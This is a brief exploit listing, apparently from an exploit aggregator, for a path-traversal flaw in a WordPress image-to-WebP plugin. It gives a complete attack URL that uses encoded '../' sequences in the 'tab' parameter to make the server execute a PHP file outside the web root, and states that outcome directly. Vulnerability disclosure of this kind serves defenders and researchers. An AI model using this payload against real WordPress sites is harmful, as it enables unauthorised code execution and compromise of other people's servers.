Share 
## https://sploitus.com/exploit?id=WPEX-ID:5A363EEB-9510-4535-97E2-9DFD3B10D511
Assuming WordPress installed at C:\xampp\htdocs\wordpress,

https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=%2F..%2F..%2F..%2F..%2F..%2Fphp_file

This will execute php_file.php at C:\xampp, outside the web-exposed directory.